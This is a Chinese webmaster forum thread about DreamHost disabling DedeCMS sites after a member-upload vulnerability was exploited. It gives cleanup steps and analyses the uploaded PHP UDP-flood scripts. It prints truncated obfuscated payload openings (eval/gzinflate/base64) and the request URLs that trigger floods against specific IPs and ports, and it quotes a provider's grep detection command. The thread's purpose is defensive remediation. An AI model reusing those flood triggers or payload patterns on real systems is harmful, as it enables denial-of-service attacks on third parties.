返回列表 发帖

DH空间全面封杀织梦站。 DreamHost上用织梦建站全挂了。如何解决!如何重做

10月份 DH又封杀织梦站分析:

DH又封杀织梦站,包括织梦5.7版。 还有DH空间上phpwind论坛站也出了问题。如何解决?

http://www.idc866.com/thread-13931-1-1.html




Hello,
During a scan of our servers we have identified that your DreamHost account is hosting an insecure version of the popular "DedeCMS" software. Due to recent attacks against this software we have been forced to disable insecure versions until the webmasters are able to address this matter and upgrade their sites the a secure version
Insecure sites identified:

/home/ch***6/ch***6.cn

We have disabled the sites in question until you are able to address this matter, this is for the safety of our servers and the customers you share them with.  We will require that you take a few minutes to address this matter and secure your account from further abuse.
If you have any questions, please feel free to contact our support staff (make your subject line include ATTN: Security) and we will be more than happy to assist you with securing your sites.
Sincerly,
The DreamHost security team




注:这是幸运的。来信告诉你 网站有问题了。  
     你必需去解决。  免得DH帐户被封了。
     有些,DH会把你网站目录改成长长的 目录名,至网站无法打开
     有些是,把那些被上传的木马设为000属性,至无法访问。

     有些DH帐户是直接被封了的。




把FTP里目录换成了: ch8***.cn_DISABLED_BY_DREAMHOST__INSECURE

如果你把FTP里改过来,而不解决问题(如更新版本), 这样会引起帐户被删的可能。




织梦最新版论坛相关贴:http://bbs.dedecms.com/331304.html
织梦最新版下载地址:http://www.dedecms.com/products/dedecms/downloads/
分享到: QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
★ 11月开空间新规则,百度GG收录百贴:http://idc866.com/thread-15155-1-1.html
★ 本站转型:推荐免费空间,收集免费空间,免费空间测试,并提供原创申请教程。
★ 免备案空间,免费空间,免费国外空间,国外免费空间,免费美国空间
★ 我们是一群辛勤的小站站长,我们需要团结,我们需要共同进步!!!!
★ 达要求开空间,论坛发申请贴后,请加QQ:876812422  (一般在线、有Q必回)

如何解决!  过下分析,先搬站!

------------------------7.5日加--------------------

讲解DH两次关站, 关于这两次关站。这两次DH关闭分析。

DH于5.21,关了一部分被上传了攻击程序的织梦站:

DH于6.23  关闭了全部的织梦网站。免费空间




关于这个被上传的程序,分析我们这两次遇到的。

5、21日,DH发来邮件说,几个使用织梦程序的站被上传了攻击程序,已被临时关闭。
              其实并不是关闭,只是FTP里域名目录被改成长长的了。要解决问题后,才给开启。  

我们当时就就打包网站,备份数据。并把网站域名从DH上删除,并且清除数据库。



6.23 日,DH又发来邮件说,织梦站都关了。
             我DH上的所有织梦站。这次应该是所有的织梦站都关了。
             因为,我的一个没绑域名的,只放了个织梦程序的目录,也被改名,并发邮件来了。

              DH大规模关闭 织梦站。    也像上次一样,改了域名目录为长长的。            



DH群里,大家都大叫,织梦站关了。咱办??  


就算你是用的最新程序,全新安装的站,都关了。  怎么回事?全清了?




但是群里有些用织梦做站群的,又在反应他做的几十个织梦,好好的。

后来他道出原因,他是自己弄的简易织梦。也就是把一些不需要的文件都删除了。

删除了包括会员目录 member。 没有会员目录 member的站,就无法会员管理。

DH这次清理是针对织梦站的,并且基本上是全清。
难道DH只是以  member中的某些文件来断定你用的织梦站,并把你站清理掉??





很多人在DH群里问,网站该如何恢复??   织梦站,还可以使用DH吗?

综合上述现象分析,可以肯定的回答,可以:




那么,如何在DH空间上重建织梦站呢?

方法供参考:
本贴隐藏内容,需登录、回复后,即可浏览!

第3点很重要。这样DH以后就不会再查你织梦站了。
第4点清除木杷,就不会让你站反复被黑,或利用来做攻击源。


经过这几步,你站的就可以完全放心的运作了。
如果有能力和条件,最好是把织梦程序升级到最新版。


但是关闭会员注册后,就只能自己发信息了。。。做站群的都是自己一个人在发的。
如果是会员互动的站,就要考虑换空间啦。


请别错过下面 五、六、七 楼 的问题分析。
★ 11月开空间新规则,百度GG收录百贴:http://idc866.com/thread-15155-1-1.html
★ 本站转型:推荐免费空间,收集免费空间,免费空间测试,并提供原创申请教程。
★ 免备案空间,免费空间,免费国外空间,国外免费空间,免费美国空间
★ 我们是一群辛勤的小站站长,我们需要团结,我们需要共同进步!!!!
★ 达要求开空间,论坛发申请贴后,请加QQ:876812422  (一般在线、有Q必回)

TOP

是说织梦有安全漏洞吗

TOP

跟织梦官方说一下,同时询问织梦有什么安全漏洞
跟他官方如实放映,修复漏洞


————————————纯属天真想法

TOP

是织梦的漏洞引起的。。

主要是织梦系统程序开启会员注册后,会员利用软件发布等漏洞。
http://bbs.dedecms.com/354574.html

如果你关闭了会员注册,就不会出现这问题。


注:如果你是自己发布文章的话,那么最好把会员注册关闭。





不过在新版的织梦5.7系统中  已说补上了。  如果是安装全新的是没问题。

但是很多使用此织梦老版系统,如5.6等,就存在这问题。

就算是官方现在的 5.6包,在官方的下载5.6包也还是没有补上的。

还是需要自己手动手补上。



而且,如果你只是5.6版本。  经过升级成 5.7的最新版。
或许,你只是在原文件上进行覆盖。
那么,已利用漏洞上传的木马呀、攻击程序呀,还是在你网站上的。


如果你不确定网站是否已存在已上传的文件,
最好的解决办法是,程序升级到最新版后,
再删除网站中的所有文件(所有文件移到一个目录里了好,以免删除错误),
再重新上传全新的官方包, 再上传配制文件,这样就是全新的程序。绝没木马等。
(配制文件是:data目录下的common.inc.php、与config.cache.inc.php 文件 )

删除install、修改dede目录、关闭会员注册或删除member目录(如果只是自己发文章),

还可以删除 plus 目录后,会有一些php文件不能使用。很多都是通过这里的程序入侵。
如搜索。怕出404 就建个空白的在里面就成了

即OK。
★ 11月开空间新规则,百度GG收录百贴:http://idc866.com/thread-15155-1-1.html
★ 本站转型:推荐免费空间,收集免费空间,免费空间测试,并提供原创申请教程。
★ 免备案空间,免费空间,免费国外空间,国外免费空间,免费美国空间
★ 我们是一群辛勤的小站站长,我们需要团结,我们需要共同进步!!!!
★ 达要求开空间,论坛发申请贴后,请加QQ:876812422  (一般在线、有Q必回)

TOP

讲解DH两次关站, 关于这两次关站。我们都把被上传相应的程序清理出来了,以便分析。

5.21织梦漏洞导至上传的程序,至使服务器大量流量,应该是攻击他人

6月23日高流量输出,


分析攻击程序代码:







5.21后,把几个织梦站迁到VPS上后,VPS大流量来了。
            在HyperVM 显示 900M/S流量。  能有这么大吗??

            登录 HyperVM  都很慢。关VPS,重启。
            FTP里,把域名目录都改了。一切恢复正常。

           再一个一个清理。最后发现一个网站目录里有新添加的文件。。

           拉下来一分析。。是个攻击型程序。  执行一下,显示发送流量5G、10G的不等。

          删除后,服务器正常!


查看这攻击文件内容为 a.php:

  1. <?php
  2. eval

  3. (gzinflate(base64_decode('7f37dxzXdSYM/0yvpf+h3EbUgA2Adb8QBK26SpB5E0FSF5KD1ehuAC02upvdDV5E8vtfnL
复制代码

后面还很多的乱乱的看不明白。


此次是二三个文件结合,


检测日志发现是这样,执行时是运行:  
         /plus/config_system.php?host=60.191.150.6&port=50002&time=60
但 config_system.php并不是攻击代码源程序。







6.23日 DH又大规模关站了, 包括没有域名解析的 目录(里面有织梦程序)
           但也是在这一天。VPS又来了大流量了。也是几百M/S显示流量。
           经分析清理,还是上的一个上次从DH移过来的站出的问题。

          一直找不到文件,因为没看到被更新的文件。
          最后下载这个站的最近来路统计。发现一个不熟悉的文件在访问。
          下载文件分析,看来又是这个文件在执行。

原文件代码:

  1. */
  2. eval(gzinflate(base64_decode('DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw6zP
复制代码


经检测,这次是执行的:
/include/tpllib/plus_info.php?ip=61.155.142.141&port=80&time=100

目录下的这个文件。。   可以看出这两次被上传的文件存放的目录不同。
这个目录下的文件,还是上次DH关站时上传了的,日期还是那个以前的。

所以,你网站最好是全部重新删除上传。以免以前上传的,还在目录里。




两次攻击,文件名、目录、源代码都不同,但是执行起来,还是一样的。

并且,经检测日志,他们同时攻击多个IP和网站。多条 IP=信息。可能是在不同的刷。


查看日志,那么多,如何去查询 执行了攻击指令呢:

那就是写字板打开日志文件,搜索:

本贴隐藏内容,需登录、回复后,即可浏览!

注:DH的网站日志在FTP根目录下的 /logs/  目录里



经过两次DH关织梦事件,可以看出,
这利用服务器进行攻击的手段是非常强大的。

一发起攻击,就会导致服务器高流量。虽然有些流量是发不出去的,见下楼:
★ 11月开空间新规则,百度GG收录百贴:http://idc866.com/thread-15155-1-1.html
★ 本站转型:推荐免费空间,收集免费空间,免费空间测试,并提供原创申请教程。
★ 免备案空间,免费空间,免费国外空间,国外免费空间,免费美国空间
★ 我们是一群辛勤的小站站长,我们需要团结,我们需要共同进步!!!!
★ 达要求开空间,论坛发申请贴后,请加QQ:876812422  (一般在线、有Q必回)

TOP

5月21日,,国内有些代售国外VPS的,的也受到影响。

收到他们的回复:


最近一段时间,我们收到一些客户的投诉说VPS经常在一天内就跑完流量,然后就被系统禁用。经检查,我们发现客户的VPS里面某个域名下的DedeCMS有漏洞,被无聊人士加以利用后上传PHP格式的UDP攻击代码,并利用它不定时发出大量的UDP包去攻击其他IP。目前我们已经在我们机柜的核心交换机上部署了相关的安全设置,禁止这些UDP包通过交换机,保证了其他客户的正常使用。不过即使这些数据包无法通过我们的线路发布出去,但是还是会客户的VPS产生巨大的流量而导致被系统禁用。 国外免费空间
如果您发现您的VPS流量有异常,请立即联系我们的客服人员,我们将配合您找出可能有问题的代码文件。

另外,如果您熟悉Linux下的Shell命令,您也可以尝试通过下面的命令,快速找出有问题的文件。该命令为一行,拷贝后粘贴执行即可。

for i in `find /home/admin/ -type d -name "plus"`; do grep -i 'eval(gzinflate(base64_decode' $i/*.php; done

注意的是执行该代码会占用大量的IO资源,请勿恶意使用。  
(以上代码是 在SSH 里 用以上命令查找 文件内容)



这段代码是,查找 网站目录下包括 gzinflate(base64_decode' 源代码的,所有PHP文件。
但是经过上一楼分析。他们这里的源代码,有时是不同的。

只能说,发现这文件被利用来攻击,再用以上命令查找VPS中其它站是否还存在这相同的文件。

不同代码的攻击文件,就无法查找到了。



如果你只是用空间,无 SSH登录权,可使用这个工具的 查找 功能:
还在说FTP上传慢吗? 妙用 PHP文件管理工具,直接下载,空间文件查找。
http://www.idc866.com/thread-13429-1-1.html



分析到这,应该基本上理清了,这次DH关织梦站的问题了!

如有站友有这方面的问题,可回贴讨论。
★ 11月开空间新规则,百度GG收录百贴:http://idc866.com/thread-15155-1-1.html
★ 本站转型:推荐免费空间,收集免费空间,免费空间测试,并提供原创申请教程。
★ 免备案空间,免费空间,免费国外空间,国外免费空间,免费美国空间
★ 我们是一群辛勤的小站站长,我们需要团结,我们需要共同进步!!!!
★ 达要求开空间,论坛发申请贴后,请加QQ:876812422  (一般在线、有Q必回)

TOP

哇塞!看得不太懂,但超经典!

TOP

看看,学习了

TOP

我来学习的

TOP

我的也被屏蔽了唉

TOP

其实可以用WordPress然后安装CMS样式也可以啊

TOP

真的是郁闷,主要是dh上面用dedecms的太多了

TOP

看看是怎么会事,再不弄好,可以有空间会被封了!

TOP

正找这个呢·····支持下···

TOP

正着这个呢

TOP

看看66666666666

TOP

回复 2# idc886


  共同研究啊

TOP

看下啊

TOP

我的站也被提示了

TOP

返回列表